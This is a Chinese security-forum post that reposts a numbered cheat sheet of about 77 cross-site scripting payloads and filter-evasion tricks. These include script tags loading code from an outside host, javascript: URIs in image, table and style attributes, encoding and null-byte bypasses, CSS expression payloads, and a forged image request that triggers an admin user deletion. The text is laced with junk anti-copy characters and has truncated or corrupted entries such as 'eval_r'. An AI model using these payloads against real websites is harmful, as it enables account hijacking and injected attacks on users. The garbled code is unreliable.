貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
- `5 b; S/ ^7 R1 u* D(1)普通的XSS JavaScript注入
: S. }" o5 o$ T! ^# w, T<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; _7 p; O' M4 |+ n" ?3 C(2)IMG标签XSS使用JavaScript命令
3 Z1 S2 E( V; M<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 \& w: @2 \7 r(3)IMG标签无分号无引号
' {4 A5 W" u& p, d, b$ h<IMG SRC=javascript:alert(‘XSS’)>- g) E6 M8 f6 {% x* k* m
(4)IMG标签大小写不敏感5 ?" y X6 o9 Q0 d# a
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>2 `! z7 h: `( f$ _5 z
(5)HTML编码(必须有分号)
7 b/ V0 m" Y2 O( E* j8 Z5 N. l<IMG SRC=javascript:alert(“XSS”)>
4 m3 N+ |7 d& J2 w$ U! F(6)修正缺陷IMG标签
% ^: Z0 @: g) ^% u; x2 L<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>+ i0 n. i" h- I
+ N& L4 K$ T/ }$ J
3 |, P2 N7 | U- U$ S$ {
(7)formCharCode标签(计算器)
8 Y! S0 ?. N9 w) `* `<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 C, S2 c0 O% p2 u(8)UTF-8的Unicode编码(计算器)' ?7 i) {6 O6 D
<IMG SRC=jav..省略..S')>
/ ]$ s( f1 A w; G, G' ?(9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 o5 Q: T8 R1 i6 M' ^
<IMG SRC=jav..省略..S')>
; d. `9 H/ r# L/ s% z* w1 Y(10)十六进制编码也是没有分号(计算器)2 t, t) y4 Q, z4 u) _6 m h
<IMG SRC=java..省略..XSS')>7 B% R$ S/ _3 L
(11)嵌入式标签,将Javascript分开' W0 `' U# e7 \* X
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 V/ f+ S" n9 U- h(12)嵌入式编码标签,将Javascript分开7 `- I; }; i+ R
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 o8 X. J( \/ l$ M Q" e% N(13)嵌入式换行符
% o' F) |- j+ i9 m<IMG SRC=”jav ascript:alert(‘XSS’);”>3 {4 s) h, t8 P. w5 I- J6 M- X3 k& |
(14)嵌入式回车: w9 ]# ^5 L8 F w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* L( t0 F r7 t* G& Z+ D. B(15)嵌入式多行注入JavaScript,这是XSS极端的例子
' H4 G) n7 O+ Z; G5 m h4 d5 N<IMG SRC=”javascript:alert(‘XSS‘)”>
2 T6 ?; M' Q: f( j7 q" @4 H' {5 T7 x(16)解决限制字符(要求同页面)
5 y8 z5 d; _% x& l# Q- A3 g! b<script>z=’document.’</script>8 |/ \- ~$ V' X+ B( i+ K
<script>z=z+’write(“‘</script>% o* D+ S5 I% b& a' T' W
<script>z=z+’<script’</script>
; G3 }$ L; O* m5 C<script>z=z+’ src=ht’</script>6 s# U) }5 t/ ?4 M" T8 a5 J
<script>z=z+’tp://ww’</script>
' u- ^4 Q2 K' Y8 j# G7 ]1 t3 U) h<script>z=z+’w.shell’</script>; k; ~ Z5 Q& O% f9 A
<script>z=z+’.net/1.’</script>5 k# p: h1 u( _2 I- S4 \8 c
<script>z=z+’js></sc’</script>
& c' a% R* V( | ]' i<script>z=z+’ript>”)’</script>( F3 y1 l8 z# R% W
<script>eval_r(z)</script>: a5 k1 y) a. h: k
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
% `" j2 F6 }/ [0 A/ e2 H+ yhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6( u) V, u' G, k4 e6 k1 c4 N
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 \7 g- Y' Y% n4 c(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
! Z; E+ S' A, V/ }perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
! `" \# o0 w* b2 m7 W(19)Spaces和meta前的IMG标签! y: k' l! k0 F- \: A6 g
<IMG SRC=” javascript:alert(‘XSS’);”>
% X' E9 O+ A' Y1 f$ e5 {- j(20)Non-alpha-non-digit XSS- x6 A+ B% O/ m( O l1 }
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 l8 v4 ^0 f3 `( \9 J! ]
(21)Non-alpha-non-digit XSS to 29 A) _' r- |4 n1 z2 M0 c
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 j$ Z3 w+ b+ I
(22)Non-alpha-non-digit XSS to 3# D2 t3 V+ n: |. u0 y" R! F
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 b5 b& b0 o0 I. q0 X0 H(23)双开括号2 ~9 `& @* N; p
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 u' C0 t" x, l, f9 t* S(24)无结束脚本标记(仅火狐等浏览器)- e D5 P. g9 B5 ?+ J4 D
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
4 s/ _: b$ c* b$ u(25)无结束脚本标记2( @! ?5 n9 U. k5 O" w5 e" Z9 l
<SCRIPT SRC=//3w.org/XSS/xss.js>1 F, |3 M, G. J1 W; w8 `
(26)半开的HTML/JavaScript XSS
7 h+ `+ w, e& o<IMG SRC=”javascript:alert(‘XSS’)”. ]# z: L: W5 h+ q7 b3 r" m
(27)双开角括号4 T! o- S$ r7 w! d
<iframe src=http://3w.org/XSS.html <9 u' r/ K: g7 ?- w
(28)无单引号 双引号 分号
! h7 o; a6 }2 I% {* {+ h& Y<SCRIPT>a=/XSS/9 G; W' o+ V4 O1 C' A' g
alert(a.source)</SCRIPT>
# ^6 Z) @9 J. q(29)换码过滤的JavaScript2 l+ w* y$ {/ k* \7 B* Z2 |' _
\”;alert(‘XSS’);//
, m7 T m7 O- k D5 S( W) ^(30)结束Title标签
; P5 q5 K* k+ X3 m5 i5 H</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
. w" A9 M) K2 m: O' r# c0 M( A(31)Input Image
3 [" y m5 y. V# o( ~! h<INPUT SRC=”javascript:alert(‘XSS’);”>
4 b; V* R1 |: ?/ ?" y9 a(32)BODY Image
. i( `* s( q6 |<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 @3 U2 B+ q4 Q% j. Y(33)BODY标签
2 P7 @ Y. z% ]/ l6 U<BODY(‘XSS’)>% s+ f8 U+ H/ Z3 j' K& K
(34)IMG Dynsrc
$ Y' s3 `5 ?5 l<IMG DYNSRC=”javascript:alert(‘XSS’)”>; J3 P5 o/ M( S8 x7 B6 e
(35)IMG Lowsrc
" M/ N6 c! y* Y<IMG LOWSRC=”javascript:alert(‘XSS’)”>
9 r4 O4 d" C0 T(36)BGSOUND
( {& k- @ E$ t- D<BGSOUND SRC=”javascript:alert(‘XSS’);”>
6 v- C0 L& u0 Q4 [(37)STYLE sheet ~5 y' D) \& N" ~
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>) I4 O1 C, E9 u; E
(38)远程样式表
* n' x: h* d5 B# m% g- H' Q<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>( V. v; a' Z6 P2 [
(39)List-style-image(列表式)9 T: F2 o4 | ~
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS m4 K- V* g6 ^4 D7 _$ Q* i
(40)IMG VBscript" z' P6 U6 O4 D9 X0 J
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
, O0 V5 b' w( v. w(41)META链接url
& V: K$ n. f" q
3 k. \, ], a, F! p5 Q) X; z
) T- w) m- S3 Y9 m% N) m<META HTTP-EQUIV=”refresh” CONTENT=”0;
D5 ~- v) I8 p, L8 c/ C$ HURL=http://;URL=javascript:alert(‘XSS’);”>3 ~! b0 |4 U8 c- r6 R5 Y- N
(42)Iframe$ u d# R, N+ E; s+ D, e% n* l! @, H( H) p
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
7 S, {: K) \, ]: U: Y. {6 k4 p# `(43)Frame1 M" h3 ?6 a3 r. V
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board! }! f1 T4 C/ w
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
7 l0 u2 `/ ?' G8 \(44)Table
8 z# T2 z& {6 H9 B, W3 k* ~, J<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ g) f! e# T# f4 ]! s# X% R
(45)TD
/ i$ I$ A* \7 `! ~) N7 g/ U<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>8 R3 A' B" v+ c) b
(46)DIV background-image; t! J. l- [% z" l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, ^. H9 l' ~: {% d% @
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
! ]; S, K( L9 g N- P8&13&12288&65279)! r& o9 D' W& o
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 I8 P3 k" t1 Q% e(48)DIV expression
4 X& f1 q7 C9 t0 p7 U5 a<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
; M% \7 E. w2 C# w' s8 M(49)STYLE属性分拆表达. b, ^6 J/ y6 G0 u; `
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
) o, E* U2 S. _0 Z" J(50)匿名STYLE(组成:开角号和一个字母开头)' }& w, ^9 x8 i+ ^3 d' h
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* u" L# i6 v- z: ` R1 y5 B
(51)STYLE background-image" k* ]5 G( a! R' A
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A1 _* b9 q: s+ ?1 X- l% @
CLASS=XSS></A>
8 g6 I$ Z9 O( J" a- [" g$ U(52)IMG STYLE方式: n5 Q% Q# J& S2 v$ l, G) i9 O
exppression(alert(“XSS”))’>9 L9 A4 c+ k) A! V
(53)STYLE background6 U: P0 ]) H4 z3 X
<STYLE><STYLE
- M8 @0 v% N9 n* atype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>6 b/ {6 @; ^, k/ p
(54)BASE5 G5 ~2 M: J& C8 T. ]( @0 O7 E
<BASE HREF=”javascript:alert(‘XSS’);//”># H0 L: ?5 O# ?/ m- b0 u4 B4 Y
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 i8 s& H2 q, l+ g
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>/ Q( z) }+ [0 M5 ]) Y
(56)在flash中使用ActionScrpt可以混进你XSS的代码( y+ s! `. G8 S
a=”get”;1 T, R3 Z, |6 _9 c$ V
b=”URL(\”";
6 b: ~7 n' q* i! H, n/ Fc=”javascript:”;8 {# h4 ~7 X0 k7 q' V- a
d=”alert(‘XSS’);\”)”;
3 A" P' o. R( T- `. \' Weval_r(a+b+c+d);
+ ]6 u0 z8 f) j; J, M7 X# e* }(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上% U/ w) O4 |. r: S3 ]/ ?, @
<HTML xmlns:xss>
7 g2 m0 d' k8 l( k: g& l6 B<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
% f- C/ J: Y+ g/ B( n<xss:xss>XSS</xss:xss>; M/ i; P+ q2 d3 u
</HTML>
7 z; o; @ ~- Z% b. g(58)如果过滤了你的JS你可以在图片里添加JS代码来利用/ w7 w0 j# ~: u
<SCRIPT SRC=””></SCRIPT>
( V% `, q/ r8 }' }9 f/ p(59)IMG嵌入式命令,可执行任意命令- Y( a, }1 {' ^, m
<IMG SRC=”http://www.XXX.com/a.php?a=b”>8 Z, s c: M& i. n7 I
(60)IMG嵌入式命令(a.jpg在同服务器)
$ [# [% N# \& q( ^' [! V, D4 R9 J6 bRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- a* j) v* L! ~$ p A5 w( O1 B/ I* H
(61)绕符号过滤
/ x2 z- Q( t U4 v4 h- Y% _<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ \" B7 M' H/ {1 J, N; x( ?1 \(62)
! E X5 I. L1 e# G' N, Z) _, @3 i: \<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
- [0 B& F! ^) l- N* w5 l9 u(63)- ]- X% \8 `2 r6 S }: r/ ]0 J2 @
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>+ r/ T+ _% D) Z2 j
(64)0 s3 N! r$ G% ]0 g2 F% f9 i
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>6 W1 {) D1 ], C; D7 X, [
(65) I ^: B; r) i; ?8 Y) b
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
k2 C$ z% ?0 I$ f* {(66)12-7-1 T00LS - Powered by Discuz! Board
' i8 Z y- R% @& W) C7 Z3 d* [4 vhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
9 F, D0 s9 o, e; s/ I% D<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
' U( J5 _4 x; J$ l& X0 s(67)
5 y4 L* t) l9 A! v2 m C<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>0 I$ F8 [+ y( y2 O
</SCRIPT>4 h. B7 w+ p; b+ @ W8 x
(68)URL绕行
& o \) |" X/ _! j9 u- F, w6 o<A HREF=”http://127.0.0.1/”>XSS</A>- V4 r8 P# b" v) P* \4 Q
(69)URL编码
0 A! o* ]! \, w5 w/ @4 P<A HREF=”http://3w.org”>XSS</A>
# _% J: F& d0 @6 t& ?1 v m(70)IP十进制3 V* ^* b" g/ f4 Q8 |* R" H* [3 A
<A HREF=”http://3232235521″>XSS</A>
3 \, P/ C- d/ S/ B, s(71)IP十六进制
# Q. T/ ?5 {# {9 U* X<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
! R' O- E* }7 a' ?1 u" d(72)IP八进制
{1 ~: [' n* O0 F* Y9 g P5 k<A HREF=”http://0300.0250.0000.0001″>XSS</A>
* X2 f5 `4 ?/ S(73)混合编码1 S7 ^$ c0 n! Q
<A HREF=”h
8 E9 t; x2 S2 p; [tt p://6 6.000146.0×7.147/”">XSS</A>2 q c9 f* a2 @, Y5 [
(74)节省[http:]
: _2 y0 e$ h# `* d<A HREF=”//www.google.com/”>XSS</A>. A- x3 N' B0 j1 x% S4 _+ t. [
(75)节省[www]3 [0 {' J6 U) G! d6 X! j5 t
<A HREF=”http://google.com/”>XSS</A> X+ I2 }- z" A' @7 w$ e8 O
(76)绝对点绝对DNS
$ l+ \* Q: b' G4 N% e<A HREF=”http://www.google.com./”>XSS</A>8 b! l2 P$ a7 q0 K" `
(77)javascript链接5 A6 ^. g% V: Q0 E1 ?4 X
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
5 U4 K! r7 U3 i# _- S& e. h* Q0 O9 F
原文地址:http://fuzzexp.org/u/0day/?p=14
. o2 z; B: t6 C' O3 ?9 H: F5 |
) c( y/ o) A% q4 e: X2 j4 j |
发表于 2013-4-19 19:22:37
收藏
分享
支持
反对